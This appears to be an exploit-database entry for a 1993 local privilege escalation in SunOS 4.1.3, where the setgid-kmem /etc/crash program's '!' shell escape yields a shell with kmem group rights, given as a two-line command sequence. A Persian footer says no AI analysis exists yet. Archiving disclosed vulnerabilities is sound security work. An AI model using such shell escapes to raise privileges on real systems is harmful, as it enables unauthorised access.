SunOS 4.1.3 - '/etc/crash' SetGID kmem Privilege Escalation

Exploit Author: anonymous Analysis Author: www.bubbleslearn.ir Category: Local Language: Shell Published Date: 1993-02-03
source: https://www.securityfocus.com/bid/59/info

/etc/crash was installed setgid kmem and excutable by anyone. Any user can use the ! shell command escape to executes commands, which are then performed with group set to kmem.

$ /etc/crash
! sh


درحال حاضر تحلیل هوش مصنوعی برای این اکسپلویت تولید نشده است!